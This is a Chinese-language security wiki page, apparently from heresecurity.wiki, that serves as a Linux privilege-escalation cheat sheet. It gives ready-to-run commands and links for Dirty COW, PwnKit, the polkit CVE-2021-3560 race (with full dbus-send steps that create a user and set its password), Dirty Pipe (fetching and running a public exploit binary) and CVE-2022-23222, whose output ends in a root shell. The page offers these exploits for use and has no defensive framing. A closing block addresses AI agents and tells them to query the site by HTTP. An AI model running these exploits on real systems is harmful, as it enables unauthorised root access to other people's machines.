# 漏洞提权 **Linux脏牛提权** ``` https://github.com/FireFart/dirtycow $gcc -pthread dirty.c -o dirty –lcrypt $./dirty passwd 生成账户密码 https://github.com/gbonacini/CVE-2016-5195 $make $./dcow -s ``` **CVE-2021-4034** ``` https://github.com/berdav/CVE-2021-4034 只需执行make,./cve-2021-4034然后get root shell ``` **CVE-2021-3560** ``` 检查执行命令所需时间 >time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 提前结束(多运行几次) >dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 & sleep 0.0035s ; kill $! 生成密码 >openssl passwd -5 ignite@123 执行(多运行几次) >dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $! >su ignite >password: ignite@123 >whoami >id >sudo bash获取root ``` **CVE-2022-0847** ``` >wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64 >./traitor-amd64 --exploit kernel:CVE-2022-0847 >whoami >id 或 >git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git >cd CVE-2022-0847-DirtyPipe-Exploit >./compile.sh >./exploit ``` **CVE-2022-23222** ``` https://github.com/tr3ee/CVE-2022-23222 ``` ```bash $ make cc -I include -static -w -o exploit exploit.c $ ./exploit [*] phase(1/8) 'create bpf map(s)' running [+] phase(1/8) 'create bpf map(s)' done [*] phase(2/8) 'do some leak' running [+] phase(2/8) 'do some leak' done [*] phase(3/8) 'prepare arbitrary rw' running [+] phase(3/8) 'prepare arbitrary rw' done [*] phase(4/8) 'spawn processes' running [+] phase(4/8) 'spawn processes' done [*] phase(5/8) 'find cred (slow)' running [+] phase(5/8) 'find cred (slow)' done [*] phase(6/8) 'overwrite cred' running [+] phase(6/8) 'overwrite cred' done [*] phase(7/8) 'spawn root shell' running [+] Enjoy root! # id uid=0(root) gid=0(root) groups=65534(nobody) # exit [+] phase(7/8) 'spawn root shell' done [*] phase(8/8) 'clean up the mess' running [+] phase(8/8) 'clean up the mess' done ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-ti-sheng/linux-ti-quan/lou-dong-ti-quan.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.